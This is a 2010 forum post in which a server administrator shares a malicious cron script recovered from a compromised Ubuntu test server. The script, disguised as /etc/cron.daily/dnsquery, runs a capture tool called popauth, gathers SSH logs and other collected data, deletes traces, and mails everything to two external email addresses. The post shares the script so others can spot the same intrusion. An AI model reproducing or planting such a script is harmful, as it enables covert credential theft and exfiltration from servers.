Thread: Hacked!!!
View Single Post
  #4  
Old 2nd March 2010, 00:06
SamTzu SamTzu is offline
HowtoForge Supporter
 
Join Date: Apr 2007
Location: Helsinki
Posts: 426
Thanks: 33
Thanked 55 Times in 38 Posts
Send a message via Skype™ to SamTzu
Default

The plot thickens.
This was recovered on one of our tests servers that has ISPconfig2 on Ubuntu 8.04 LTS.

They used /etc/cron.daily/dnsquery:

#!/bin/sh
cd /usr/lib/
./popauth -r httpd.log >> test
echo "$(uptime)" >> test
rm -rf httpd.log
echo "named.sn"
cat /usr/lib/named/named.sn >> test
rm -rf /usr/lib/named/named.sn
cd /usr/lib/named
./clean
./cleanssh
echo "ssh.log" >> /usr/lib/test
cat ssh.log >> /usr/lib/test
cd /usr/lib/
mail thelinuxpinguin@yahoo.com -s "$(hostname -f)" < test
mail stormuletzz@yahoo.ca -s "$(hostname -f)" < test
A=$PATH
killall -9 popauth
export PATH=/usr/lib/
popauth -w httpd.log &
export PATH=$A
__________________

Sami Mattila
Internet-Content

Telephone:
00358942833310
Email: firstname.lastname@internet-content.org
Shop: http://shop.internet-content.net
Site: http://www.internet-content.net
Blog: http://www.internet-content.net/en/blog
FB: https://www.facebook.com/internetcontent


Last edited by SamTzu; 2nd March 2010 at 00:13.
Reply With Quote